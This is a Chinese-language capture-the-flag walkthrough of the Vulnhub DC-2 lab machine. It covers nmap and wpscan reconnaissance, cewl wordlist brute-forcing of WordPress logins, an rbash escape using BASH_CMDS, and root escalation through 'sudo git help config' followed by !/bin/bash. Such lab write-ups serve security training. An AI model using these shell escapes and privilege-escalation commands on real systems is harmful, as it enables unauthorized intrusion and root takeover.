Vulnhub 靶场——DC2

一、环境简介

1.攻击机：kali 192.168.56.101 win10
2.靶机：192.168.56.104
靶机下载地址：https://www.vulnhub.com/entry/dc-2,311/
本次目标拿下5个flag

首先在kali里面arp-scan -l进行发现主机

对目标网站进行nmap扫描
nmap -sV -p 1-65535 -A 192.168.56.104

开启了80端口和7744 ssh的端口，我们现从web80开始渗透，注意要加上dns解析
hosts文件位置

sudo vim /etc/hosts    kali
C:\Windows\System32\drivers\etc\hosts  win10

192.168.56.104 dc-2 像这样加上就行

打开页面就给了flag，翻译一下同时给了flag2的线索。

在flag1中，给出提示有cewl,cewl是一款以爬虫模式在指定URL上收集单词的工具，可以将它收集到的单词纳入密码字典，以提高密码破解工具的成功率,看到这知道了，肯定是爆破了，有ssh在，很有可能爆破ssh或者wordpress的后台。

cewl的使用
cewl dc-2 -w dict.txt

现在手上已经有爆破用的密码了，只差用户名了，我们使用wpscan来提取用户名，wpscan是专门最对wordpress的扫描器。
wpscan第一次使用可能会更新失败，在这里给出解决办法。
wpscan --url dc-2 -e u

扫出来三个用户名，那么直接开始爆破吧，我这里用burpsuite先对他的后台爆破进行尝试。至于网站后台有多种方法可以获取到，如御剑的后台扫描，dirsearch,其实wordpress后台一百度就出来。

我们用爆出来的密码尝试登陆，发现
log=jerry&pwd=adipiscing
log=tom&pwd=parturient
使用Jerry登陆时候，发现了flag2

出现flag2的时候，他给了提示，所尝试用别的办法，这里别忘了我们前面还收集到了SSH，这地方我没用爆破，直接尝试用这两个用户和密码登陆，发现tom可以登陆。

但是我们发现现在的命令行是受限制的。所以我们需要绕过rbash.

rbash绕过技巧（我兄弟写的）

tom@DC‐2:~$ BASH_CMDS[a]=/bin/sh;a
$ /bin/bash
tom@DC‐2:~$ export PATH=$PATH:/bin/
tom@DC‐2:~$ export PATH=$PATH:/usr/bin

当我们打开flag3的时候，同时也是给出了提示，这是什么鬼翻译....反正要切换为juerry

我们切换到Jerry，并且切换到Jerry文件夹，发现flag4

他说没有提示，其实还是有的，用git提权。

不过还是看一下是否可以suid提权，发现确实没有可以利用的命令。

那我们看看有没有可以执行的具有root权限的命令
sudo -l

sudo git help config
	!/bin/bash或者！'sh'完成提权

sudo git  -p help
	!/bin/bash

成功拿到flag

1.首先是信息的收集：nmap cewl与wpscan的使用
2.如何去绕过受限制的shell rbash
3.suid提权不可以使用，如何使用git提权，以及sudo -l查看拥有root权限的命令。

vulnhub靶机